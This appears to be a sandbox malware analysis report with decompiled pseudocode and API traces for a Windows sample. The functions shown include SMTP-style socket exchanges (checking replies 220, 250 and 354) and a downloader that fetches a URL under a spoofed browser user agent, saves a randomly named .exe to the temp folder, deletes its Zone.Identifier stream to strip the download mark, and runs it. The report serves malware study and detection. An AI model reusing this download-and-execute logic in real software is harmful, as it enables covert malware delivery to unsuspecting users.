                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892732980.0000000000EA4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892759245.0000000000EA6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892764370.0000000000EA7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_ea0000_1925824589.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeQuery_gethostbynamehtonsinet_addr
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1447329520-0
                                                                                                                                                                                                                                                                                    • Opcode ID: f888e2abaf1728656a12423c8e9342edb8be7d976cffd29dda253389aee11d2e
                                                                                                                                                                                                                                                                                    • Instruction ID: 1c29ab3ef79d1be29e3c8a9c2199666c4c13a1999f2e87843cee4035f995b811
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f888e2abaf1728656a12423c8e9342edb8be7d976cffd29dda253389aee11d2e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B01DA74A00208EBEB10DFA0D886B99B7B5AF59704F209199F9046F381D7B6EA45CB91
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • select.WS2_32(?,00000000,00000000,00000000,00000400), ref: 00EA130C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.892724043.0000000000EA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892708963.0000000000EA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892732980.0000000000EA4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892759245.0000000000EA6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892764370.0000000000EA7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_ea0000_1925824589.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: select
                                                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                                                    • API String ID: 1274211008-2766056989
                                                                                                                                                                                                                                                                                    • Opcode ID: 11920b529e083f65ff1b44e70f3a047176a888ce70463a85a1f0227e48dbd75e
                                                                                                                                                                                                                                                                                    • Instruction ID: 86542751f557659eb45df7a65f133444e0b3d9f8abac17fa904b372c58cd0042
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 11920b529e083f65ff1b44e70f3a047176a888ce70463a85a1f0227e48dbd75e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B521EE7090011CDBCF58CF54C8927DDB7B6EB5A314F10C1D9E609AB294DA30AF819F94
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.892724043.0000000000EA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892708963.0000000000EA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892732980.0000000000EA4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892759245.0000000000EA6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892764370.0000000000EA7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_ea0000_1925824589.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: gethostbynameinet_addr
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1594361348-0
                                                                                                                                                                                                                                                                                    • Opcode ID: ff199b54ee2cd8e8527d04124e87b5e563f679bce9d1ae58726b822eda2885f1
                                                                                                                                                                                                                                                                                    • Instruction ID: 62bb9884827288040f26d504fc50f70eb471473aa0bb6691fc08f8684401430d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff199b54ee2cd8e8527d04124e87b5e563f679bce9d1ae58726b822eda2885f1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88F0FE74901208EFCB00DFB4D54489DBBB5EB5E315F208694D955AB390D730AA80DB80
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                                                                    			E00EA1120(intOrPtr _a4, CHAR* _a8, int _a12) {
                                                                                                                                                                                                                                                                                    				intOrPtr _t10;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				if(_a12 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    					_a12 = lstrlenA(_a8);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t10 = _a4;
                                                                                                                                                                                                                                                                                    				__imp__#19(_t10, _a8, _a12, 0); // executed
                                                                                                                                                                                                                                                                                    				return 0 | _t10 == _a12;
                                                                                                                                                                                                                                                                                    			}




                                                                                                                                                                                                                                                                                    0x00ea1127
                                                                                                                                                                                                                                                                                    0x00ea1133
                                                                                                                                                                                                                                                                                    0x00ea1133
                                                                                                                                                                                                                                                                                    0x00ea1140
                                                                                                                                                                                                                                                                                    0x00ea1144
                                                                                                                                                                                                                                                                                    0x00ea1155

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00EA112D
                                                                                                                                                                                                                                                                                    • send.WS2_32(?,?,000000FF,00000000), ref: 00EA1144
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.892724043.0000000000EA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892708963.0000000000EA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892732980.0000000000EA4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892759245.0000000000EA6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892764370.0000000000EA7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_ea0000_1925824589.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: lstrlensend
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3675724601-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 102a81ff73d0e4263af2b87dde6dd7861775dc8eda2903a05dc3401957322f81
                                                                                                                                                                                                                                                                                    • Instruction ID: f6f72436e0e2c25a4fea67510b398652db406946df58f47a75b9291462a91545
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 102a81ff73d0e4263af2b87dde6dd7861775dc8eda2903a05dc3401957322f81
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EE048B12043099FCF04CF68DC4499B37A8BB5C310F404618FA29C7190D770E510CB50
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • recv.WS2_32(?,00000000,?,00000000), ref: 00EA119F
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.892724043.0000000000EA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892708963.0000000000EA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892732980.0000000000EA4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892759245.0000000000EA6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892764370.0000000000EA7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_ea0000_1925824589.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: recv
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1507349165-0
                                                                                                                                                                                                                                                                                    • Opcode ID: e914b859a23bf26dea4ba130bd6c24e7eeb4e410e01272c06e81302777836258
                                                                                                                                                                                                                                                                                    • Instruction ID: dd7c9f6248aef1935e1aa338b77b42c6904235d0379c7b2a397d8fd12280f077
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e914b859a23bf26dea4ba130bd6c24e7eeb4e410e01272c06e81302777836258
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EFF05E75601309ABDF00CE54DC04BEB37A8AB2D389F005858FA19AE290D3B4F550CB94
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 73%
                                                                                                                                                                                                                                                                                    			E00EA1320(void* __ecx, intOrPtr _a4, char* _a8) {
                                                                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                                                                    				signed int _t19;
                                                                                                                                                                                                                                                                                    				void* _t32;
                                                                                                                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				 *_a8 = 0;
                                                                                                                                                                                                                                                                                    				srand(GetTickCount());
                                                                                                                                                                                                                                                                                    				_t33 = _t32 + 4;
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				while(_v8 < _a4) {
                                                                                                                                                                                                                                                                                    					_t19 = rand();
                                                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                                                    					_push(_t19 % 0xa);
                                                                                                                                                                                                                                                                                    					_push(_a8);
                                                                                                                                                                                                                                                                                    					sprintf(_a8, "%s%d");
                                                                                                                                                                                                                                                                                    					_t33 = _t33 + 0x10;
                                                                                                                                                                                                                                                                                    					_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_a8[_v8] = 0;
                                                                                                                                                                                                                                                                                    				return _a8;
                                                                                                                                                                                                                                                                                    			}







                                                                                                                                                                                                                                                                                    0x00ea1327
                                                                                                                                                                                                                                                                                    0x00ea1331
                                                                                                                                                                                                                                                                                    0x00ea1336
                                                                                                                                                                                                                                                                                    0x00ea1339
                                                                                                                                                                                                                                                                                    0x00ea134b
                                                                                                                                                                                                                                                                                    0x00ea1353
                                                                                                                                                                                                                                                                                    0x00ea1358
                                                                                                                                                                                                                                                                                    0x00ea1360
                                                                                                                                                                                                                                                                                    0x00ea1364
                                                                                                                                                                                                                                                                                    0x00ea136e
                                                                                                                                                                                                                                                                                    0x00ea1373
                                                                                                                                                                                                                                                                                    0x00ea1348
                                                                                                                                                                                                                                                                                    0x00ea1348
                                                                                                                                                                                                                                                                                    0x00ea137e
                                                                                                                                                                                                                                                                                    0x00ea1387

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.892724043.0000000000EA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892708963.0000000000EA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892732980.0000000000EA4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892759245.0000000000EA6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892764370.0000000000EA7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_ea0000_1925824589.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CountTickrandsprintfsrand
                                                                                                                                                                                                                                                                                    • String ID: %s%d
                                                                                                                                                                                                                                                                                    • API String ID: 2526408171-1110647743
                                                                                                                                                                                                                                                                                    • Opcode ID: 57872b7a1674eaeb2056873c62fcab6d748857741bc7da315e64af2f43ef8631
                                                                                                                                                                                                                                                                                    • Instruction ID: 2c334fee6a6b3015658b9a4ae5d90dbab89eae232d7c0259aea8ba197a62e3c1
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 57872b7a1674eaeb2056873c62fcab6d748857741bc7da315e64af2f43ef8631
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9DF04FB4A04208EBDB04DF98D851BAD77B5EF9A304F10D089F90A6F341D671BF049766
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00EA11C0(char* _a4) {
                                                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v20 = 0xea41c0;
                                                                                                                                                                                                                                                                                    				_v16 = 0xea41c4;
                                                                                                                                                                                                                                                                                    				_v12 = 0xea41c8;
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				_v24 = 0;
                                                                                                                                                                                                                                                                                    				while(_v24 < 3) {
                                                                                                                                                                                                                                                                                    					if(StrCmpNA(_a4,  *(_t23 + _v24 * 4 - 0x10), 3) == 0) {
                                                                                                                                                                                                                                                                                    						_v8 = 1;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_v24 = _v24 + 1;
                                                                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					break;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                                                                    0x00ea11c6
                                                                                                                                                                                                                                                                                    0x00ea11cd
                                                                                                                                                                                                                                                                                    0x00ea11d4
                                                                                                                                                                                                                                                                                    0x00ea11db
                                                                                                                                                                                                                                                                                    0x00ea11e2
                                                                                                                                                                                                                                                                                    0x00ea11f4
                                                                                                                                                                                                                                                                                    0x00ea1210
                                                                                                                                                                                                                                                                                    0x00ea1214
                                                                                                                                                                                                                                                                                    0x00ea1212
                                                                                                                                                                                                                                                                                    0x00ea11f1
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea11f1
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1210
                                                                                                                                                                                                                                                                                    0x00ea1225

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • StrCmpNA.SHLWAPI(354,220,00000003), ref: 00EA1208
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.892724043.0000000000EA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892708963.0000000000EA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892732980.0000000000EA4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892759245.0000000000EA6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892764370.0000000000EA7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_ea0000_1925824589.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: 220$250$354
                                                                                                                                                                                                                                                                                    • API String ID: 0-1679323658
                                                                                                                                                                                                                                                                                    • Opcode ID: cf40730ad38e4dbc6287d018da5befaa15c0e59dce0794638276bc523ecdf0b5
                                                                                                                                                                                                                                                                                    • Instruction ID: 075a37b4185c07ffdda2f414c5779a7e2737c3b5fb7149bf4ad3e96a763d2374
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cf40730ad38e4dbc6287d018da5befaa15c0e59dce0794638276bc523ecdf0b5
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01F0F4B0905109DBCF00DFD4D9457EEBBB4BB5A304F205588D5057F280D3B1AB44DBA1
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Callgraph

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    C-Code - Quality: 81%
                                                                                                                                                                                                                                                                                    			E000210B0(WCHAR* _a4) {
                                                                                                                                                                                                                                                                                    				void _v268;
                                                                                                                                                                                                                                                                                    				short _v788;
                                                                                                                                                                                                                                                                                    				signed int _v789;
                                                                                                                                                                                                                                                                                    				void* _v796;
                                                                                                                                                                                                                                                                                    				void* _v800;
                                                                                                                                                                                                                                                                                    				short _v1324;
                                                                                                                                                                                                                                                                                    				long _v1328;
                                                                                                                                                                                                                                                                                    				long _v1332;
                                                                                                                                                                                                                                                                                    				void* _v1336;
                                                                                                                                                                                                                                                                                    				short _v1860;
                                                                                                                                                                                                                                                                                    				signed int _t63;
                                                                                                                                                                                                                                                                                    				signed int _t65;
                                                                                                                                                                                                                                                                                    				void* _t69;
                                                                                                                                                                                                                                                                                    				int _t70;
                                                                                                                                                                                                                                                                                    				signed int _t71;
                                                                                                                                                                                                                                                                                    				signed int _t73;
                                                                                                                                                                                                                                                                                    				signed int _t75;
                                                                                                                                                                                                                                                                                    				void* _t83;
                                                                                                                                                                                                                                                                                    				void* _t87;
                                                                                                                                                                                                                                                                                    				int _t90;
                                                                                                                                                                                                                                                                                    				signed char _t96;
                                                                                                                                                                                                                                                                                    				void* _t134;
                                                                                                                                                                                                                                                                                    				void* _t136;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				srand(GetTickCount());
                                                                                                                                                                                                                                                                                    				_v789 = 0;
                                                                                                                                                                                                                                                                                    				ExpandEnvironmentStringsW(L"%temp%",  &_v788, 0x104);
                                                                                                                                                                                                                                                                                    				_t63 = rand();
                                                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                                                    				_t65 = rand();
                                                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                                                    				wsprintfW( &_v1860, L"%s\\%d%d.exe",  &_v788, _t65 % 0x7530 + 0x2710, _t63 % 0x7530 + 0x2710);
                                                                                                                                                                                                                                                                                    				_t136 = _t134 + 0x18;
                                                                                                                                                                                                                                                                                    				_t69 = InternetOpenW(L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36", 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                                    				_v1336 = _t69;
                                                                                                                                                                                                                                                                                    				if(_v1336 == 0) {
                                                                                                                                                                                                                                                                                    					L10:
                                                                                                                                                                                                                                                                                    					_t70 = InternetCloseHandle(_v1336);
                                                                                                                                                                                                                                                                                    					Sleep(0x1f4); // executed
                                                                                                                                                                                                                                                                                    					if((_v789 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                    						L13:
                                                                                                                                                                                                                                                                                    						return _t70;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t71 = rand();
                                                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                                                    					Sleep(_t71 % 0xea60 + 0x3e8);
                                                                                                                                                                                                                                                                                    					_t73 = rand();
                                                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                                                    					_t75 = rand();
                                                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                                                    					_t70 = wsprintfW( &_v1860, L"%s\\%d%d.exe",  &_v788, _t75 % 0x7530 + 0x2710, _t73 % 0x7530 + 0x2710);
                                                                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                                                                    					_push( &_v1860);
                                                                                                                                                                                                                                                                                    					_push(_a4);
                                                                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                                                                    					L0002168C();
                                                                                                                                                                                                                                                                                    					if(_t70 != 0) {
                                                                                                                                                                                                                                                                                    						goto L13;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					wsprintfW( &_v1324, L"%s:Zone.Identifier",  &_v1860);
                                                                                                                                                                                                                                                                                    					DeleteFileW( &_v1324);
                                                                                                                                                                                                                                                                                    					return E00021000( &_v1860);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t83 = InternetOpenUrlW(_v1336, _a4, 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                                    				_v796 = _t83;
                                                                                                                                                                                                                                                                                    				if(_v796 == 0) {
                                                                                                                                                                                                                                                                                    					L9:
                                                                                                                                                                                                                                                                                    					InternetCloseHandle(_v796); // executed
                                                                                                                                                                                                                                                                                    					goto L10;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t87 = CreateFileW( &_v1860, 0x40000000, 0, 0, 2, 0, 0); // executed
                                                                                                                                                                                                                                                                                    				_v800 = _t87;
                                                                                                                                                                                                                                                                                    				if(_v800 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                                                                                                    					CloseHandle(_v800);
                                                                                                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					goto L3;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					L3:
                                                                                                                                                                                                                                                                                    					_t90 = InternetReadFile(_v796,  &_v268, 0x103,  &_v1332); // executed
                                                                                                                                                                                                                                                                                    					if(_t90 == 0 || _v1332 == 0) {
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					WriteFile(_v800,  &_v268, _v1332,  &_v1328, 0); // executed
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				CloseHandle(_v800);
                                                                                                                                                                                                                                                                                    				Sleep(0x3e8); // executed
                                                                                                                                                                                                                                                                                    				wsprintfW( &_v1324, L"%s:Zone.Identifier",  &_v1860);
                                                                                                                                                                                                                                                                                    				DeleteFileW( &_v1324); // executed
                                                                                                                                                                                                                                                                                    				Sleep(0x3e8); // executed
                                                                                                                                                                                                                                                                                    				_t96 = E00021000( &_v1860); // executed
                                                                                                                                                                                                                                                                                    				_t136 = _t136 + 0x10;
                                                                                                                                                                                                                                                                                    				if((_t96 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                                    					_v789 = 1;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				goto L8;
                                                                                                                                                                                                                                                                                    			}


























                                                                                                                                                                                                                                                                                    0x000210c0
                                                                                                                                                                                                                                                                                    0x000210c8
                                                                                                                                                                                                                                                                                    0x000210e0
                                                                                                                                                                                                                                                                                    0x000210e6
                                                                                                                                                                                                                                                                                    0x000210eb
                                                                                                                                                                                                                                                                                    0x000210fa
                                                                                                                                                                                                                                                                                    0x000210ff
                                                                                                                                                                                                                                                                                    0x00021121
                                                                                                                                                                                                                                                                                    0x00021127
                                                                                                                                                                                                                                                                                    0x00021137
                                                                                                                                                                                                                                                                                    0x0002113d
                                                                                                                                                                                                                                                                                    0x0002114a
                                                                                                                                                                                                                                                                                    0x00021282
                                                                                                                                                                                                                                                                                    0x00021289
                                                                                                                                                                                                                                                                                    0x00021294
                                                                                                                                                                                                                                                                                    0x000212a3
                                                                                                                                                                                                                                                                                    0x0002135c
                                                                                                                                                                                                                                                                                    0x0002135c
                                                                                                                                                                                                                                                                                    0x0002135c
                                                                                                                                                                                                                                                                                    0x000212a9
                                                                                                                                                                                                                                                                                    0x000212ae
                                                                                                                                                                                                                                                                                    0x000212bd
                                                                                                                                                                                                                                                                                    0x000212c3
                                                                                                                                                                                                                                                                                    0x000212c8
                                                                                                                                                                                                                                                                                    0x000212d7
                                                                                                                                                                                                                                                                                    0x000212dc
                                                                                                                                                                                                                                                                                    0x000212fe
                                                                                                                                                                                                                                                                                    0x00021307
                                                                                                                                                                                                                                                                                    0x00021309
                                                                                                                                                                                                                                                                                    0x00021311
                                                                                                                                                                                                                                                                                    0x00021315
                                                                                                                                                                                                                                                                                    0x00021316
                                                                                                                                                                                                                                                                                    0x00021318
                                                                                                                                                                                                                                                                                    0x0002131f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00021334
                                                                                                                                                                                                                                                                                    0x00021344
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00021356
                                                                                                                                                                                                                                                                                    0x00021163
                                                                                                                                                                                                                                                                                    0x00021169
                                                                                                                                                                                                                                                                                    0x00021176
                                                                                                                                                                                                                                                                                    0x00021275
                                                                                                                                                                                                                                                                                    0x0002127c
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0002127c
                                                                                                                                                                                                                                                                                    0x00021192
                                                                                                                                                                                                                                                                                    0x00021198
                                                                                                                                                                                                                                                                                    0x000211a5
                                                                                                                                                                                                                                                                                    0x00021268
                                                                                                                                                                                                                                                                                    0x0002126f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x000211ab
                                                                                                                                                                                                                                                                                    0x000211ab
                                                                                                                                                                                                                                                                                    0x000211c5
                                                                                                                                                                                                                                                                                    0x000211cd
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x000211f6
                                                                                                                                                                                                                                                                                    0x000211f6
                                                                                                                                                                                                                                                                                    0x00021205
                                                                                                                                                                                                                                                                                    0x00021210
                                                                                                                                                                                                                                                                                    0x00021229
                                                                                                                                                                                                                                                                                    0x00021239
                                                                                                                                                                                                                                                                                    0x00021244
                                                                                                                                                                                                                                                                                    0x00021251
                                                                                                                                                                                                                                                                                    0x00021256
                                                                                                                                                                                                                                                                                    0x0002125f
                                                                                                                                                                                                                                                                                    0x00021261
                                                                                                                                                                                                                                                                                    0x00021261
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 000210B9
                                                                                                                                                                                                                                                                                    • srand.MSVCRT ref: 000210C0
                                                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 000210E0
                                                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 000210E6
                                                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 000210FA
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00021121
